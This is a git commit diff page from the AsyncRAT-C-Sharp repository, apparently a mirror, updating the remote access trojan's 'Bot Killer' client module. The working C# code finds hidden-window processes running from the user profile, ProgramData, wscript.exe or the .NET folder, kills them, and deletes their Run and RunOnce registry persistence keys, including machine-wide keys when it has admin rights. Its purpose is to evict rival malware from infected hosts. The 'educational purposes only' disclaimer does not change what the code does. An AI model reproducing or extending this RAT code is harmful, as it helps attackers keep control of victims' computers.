Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update HandleBotKiller.cs

Browse Source
This commit is contained in:
NYAN CAT 2019-06-17 12:11:46 +03:00
parent 4abe91b06b
commit 79c990c492
1 changed files with 36 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs
View File

@ -5,16 +5,17 @@ using System.Runtime.InteropServices;
using Microsoft.Win32; using Microsoft.Win32;
using Client.MessagePack; using Client.MessagePack;
using Client.Sockets; using Client.Sockets;
using System.Security.Principal;
// │ Author : NYAN CAT // │ Author : NYAN CAT
// │ Name : Bot Killer v0.2 // │ Name : Bot Killer v0.2.5
// │ Contact : https://github.com/NYAN-x-CAT // │ Contact : https://github.com/NYAN-x-CAT
// This program Is distributed for educational purposes only. // This program Is distributed for educational purposes only.
namespace Client.Handle_Packet namespace Client.Handle_Packet
{ {
public class HandleBotKiller public class HandleBotKiller
{ {
int count = 0; int count = 0;
public void RunBotKiller() public void RunBotKiller()
@ -24,10 +25,10 @@ namespace Client.Handle_Packet
{ {
try try
{ {
string pName = p.MainModule.FileName; if (Inspection(p.MainModule.FileName))
if (Inspection(pName))
if (!IsWindowVisible(p.MainWindowHandle)) if (!IsWindowVisible(p.MainWindowHandle))
{ {
string pName = p.MainModule.FileName;
p.Kill(); p.Kill();
RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\Run", pName); RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\Run", pName);
RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", pName); RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", pName);
@ -47,13 +48,13 @@ namespace Client.Handle_Packet
} }
} }
private bool Inspection(string payload) private bool Inspection(string threat)
{ {
if (payload == Process.GetCurrentProcess().MainModule.FileName) return false; if (threat == Process.GetCurrentProcess().MainModule.FileName) return false;
if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true; if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true;
if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true; if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true;
if (payload.Contains("wscript.exe")) return true; if (threat.Contains("wscript.exe")) return true;
if (payload.Contains(RuntimeEnvironment.GetRuntimeDirectory())) return true; if (threat.StartsWith(Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), "Windows\\Microsoft.NET"))) return true;
return false; return false;
} }
@ -62,16 +63,35 @@ namespace Client.Handle_Packet
return IsWindowVisible(lHandle); return IsWindowVisible(lHandle);
} }
private void RegistryDelete(string regPath, string payload) private static void RegistryDelete(string regPath, string payload)
{ {
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true)) try
{ {
if (key != null) using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true))
foreach (string ValueOfName in key.GetValueNames()) {
if (key != null)
foreach (string valueOfName in key.GetValueNames())
{
if (key.GetValue(valueOfName).ToString().Equals(payload))
key.DeleteValue(valueOfName);
}
}
if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
{
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, true))
{ {
if (key.GetValue(ValueOfName).ToString().Equals(payload)) if (key != null)
key.DeleteValue(ValueOfName); foreach (string valueOfName in key.GetValueNames())
{
if (key.GetValue(valueOfName).ToString().Equals(payload))
key.DeleteValue(valueOfName);
}
} }
}
}
catch (Exception ex)
{
Debug.WriteLine("RegistryDelete: " + ex.Message);
} }
} }